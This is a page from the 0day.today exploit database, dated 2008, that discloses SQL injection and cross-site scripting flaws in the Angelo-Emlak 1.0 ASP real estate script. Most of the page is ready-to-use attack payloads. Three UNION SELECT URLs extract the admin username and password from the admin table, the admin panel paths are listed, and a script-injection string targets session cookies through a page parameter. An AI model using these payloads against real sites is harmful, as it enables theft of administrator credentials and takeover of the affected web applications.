[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Angelo-Emlak 1.0 Multiple Remote SQL injection Vulnerabilities

Author
U238
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-2923
Category
web applications
Date add
25-04-2008
Platform
unsorted
==============================================================
Angelo-Emlak 1.0 Multiple Remote SQL injection Vulnerabilities
==============================================================



Angelo-Emlak v1.0 Multiple Remote SQL injection Vulnerable


Discovered By : U238


Script       : http://rapidshare.de/files/39240819/angelo-emlak_v1.0.zip.html



not   : Siz0yyffyeniz biz kardesim inkar edenm? var ya  :(   - Allah .belan? versin ulan $iz0 .buda y?l?n sozu :D


_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_

Exploit:


http://localhost:2222/lab/angelo-emlak_v1.0/hpz/profil.asp?id=1+union+select+0,1,2,3,(user),(pass),1,1,1,1,1,1,1,1,1,1,1,1,1,1+from+admin+where+id=1


----------

http://localhost:2222/lab/angelo-emlak_v1.0/hpz/prodetail.asp?id=1+union+select+user,0,2,3,4,5,6,7,8,9,null,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1+from+admin

http://localhost:2222/lab/angelo-emlak_v1.0/hpz/prodetail.asp?id=1+union+select+pass,0,2,3,4,5,6,7,8,9,null,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1+from+admin

---------

Admin Panel : 

http://localhost:2222/lab/angelo-emlak_v1.0/hpz/default.asp

X13 DB Editor Admin Panel : 

http://localhost:2222/lab/angelo-emlak_v1.0/hpz/admin


_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_-_


This script is xss vulnerable ! ..

Exploit : 


target/angelo-emlak_v1.0/hpz/admin/Default.asp?sayfa=[XSS]

"><script>alert(document.cookie)</script>&olay=insert


----------------------------------------------------

My Friends : ka0x - Marco Almeida - The_BekiR - fahn - Teyfik Cevik - Nettoxic - Caborz - Sersak - ZeberuS

U238 | Web - Designer Solutions Developer



#  0day.today [2024-12-24]  #